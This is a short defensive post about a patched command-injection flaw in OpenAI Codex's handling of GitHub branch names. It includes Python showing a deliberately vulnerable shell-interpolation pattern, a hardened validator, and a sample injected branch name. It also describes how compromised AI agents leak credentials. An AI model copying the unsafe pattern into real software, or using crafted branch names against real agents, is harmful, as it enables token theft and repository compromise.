OpenAI Codex mishandled GitHub branch names in a way that allowed command injection — crafted branch names could steal access tokens and give read/write over private repositories. Patched.
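The general defect behind a bug of this shape is an untrusted branch name reaching a command line as text rather than as a single argument. The following is an added example, not Codex's code and not a reconstruction of the patched flaw: it assumes a hypothetical agent that receives branch names from an API response it does not control, shows the interpolation pattern that makes such names dangerous beside a hardened builder that validates the name against git's own ref-name rules and spawns git without a shell.

```python
import re
import subprocess
from typing import List

# Character-level rules adapted from git-check-ref-format(1): ref names may not
# contain ASCII control characters, space, DEL, or any of ~ ^ : ? * [ \ .
_FORBIDDEN_CHARS = re.compile(r"[\x00-\x20\x7f~^:?*\[\\]")


class UnsafeBranchName(ValueError):
    """Raised when an untrusted branch name fails validation."""


def validate_branch_name(name: str) -> str:
    """Return ``name`` unchanged if it is a well-formed git branch name, else raise.

    Each check maps to a git-check-ref-format rule. The leading-dash rule is the
    one that matters most for argument injection: a name such as "--output=x"
    would otherwise be parsed as an option by whichever git subcommand gets it.
    """
    if not name or len(name) > 255:
        raise UnsafeBranchName("empty or oversized name")
    if _FORBIDDEN_CHARS.search(name):
        raise UnsafeBranchName("contains a character git forbids in ref names")
    if name.startswith("-"):
        raise UnsafeBranchName("leading '-' would be parsed as an option")
    if ".." in name or "@{" in name or name == "@":
        raise UnsafeBranchName("contains a forbidden sequence")
    if name.startswith("/") or name.endswith("/") or name.endswith("."):
        raise UnsafeBranchName("bad leading or trailing character")
    for component in name.split("/"):
        if not component or component.startswith(".") or component.endswith(".lock"):
            raise UnsafeBranchName("bad path component")
    return name


def build_switch_command_unsafe(branch: str) -> str:
    """Hypothetical vulnerable pattern (constructed for this example): the branch
    name is interpolated into one string destined for a shell, so any shell
    metacharacters in the name become part of the command line."""
    return f"git switch {branch}"


def build_switch_argv(branch: str) -> List[str]:
    """Hardened pattern: validate first, then build argv as a list so no shell is
    involved and the name is always exactly one argument."""
    return ["git", "switch", validate_branch_name(branch)]


def switch_branch(branch: str, repo_dir: str) -> None:
    """Run the hardened command in ``repo_dir``. With shell=False (the default)
    the list goes straight to process spawning; the name is never re-parsed."""
    subprocess.run(build_switch_argv(branch), cwd=repo_dir, check=True)


def is_safe_branch_name(name: str) -> bool:
    """Boolean wrapper, convenient for filtering names returned by an API."""
    try:
        validate_branch_name(name)
        return True
    except UnsafeBranchName:
        return False


if __name__ == "__main__":
    # Constructed sample names: one ordinary, one carrying shell metacharacters.
    for candidate in ["feature/fix-login", "feature/x; echo injected"]:
        verdict = "accepted" if is_safe_branch_name(candidate) else "rejected"
        print(f"{candidate!r} -> {verdict}")
```

The validation is a defense in depth on top of the list-based argv: the argv form alone already stops shell metacharacters from being interpreted, while the leading-dash and sequence rules stop the remaining class of bugs where a well-formed-looking name is read as an option or a revision expression by git itself.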
Zoom out. The pattern is more important than this specific CVE.
Autonomous AI agents are being given real credentials to real systems: source code, cloud consoles, deployment pipelines, databases. Each of those credentials is a blast radius. When the agent is compromised — through prompt injection, input smuggling, or a runtime flaw like this one — the attacker inherits whatever the agent was trusted with.
The defense is not "harder prompt guards." It's scoping. An agent should have the narrowest possible authority, the shortest possible credential lifetime, and the tightest possible locality. Ideally it should not reach across the network at all.
Local-first AI is the cleanest version of that principle. The agent runs inside the boundary it is allowed to act on, with no ambient network authority to be stolen. That is not paranoia — that is the architecture the incident log is steadily arguing for.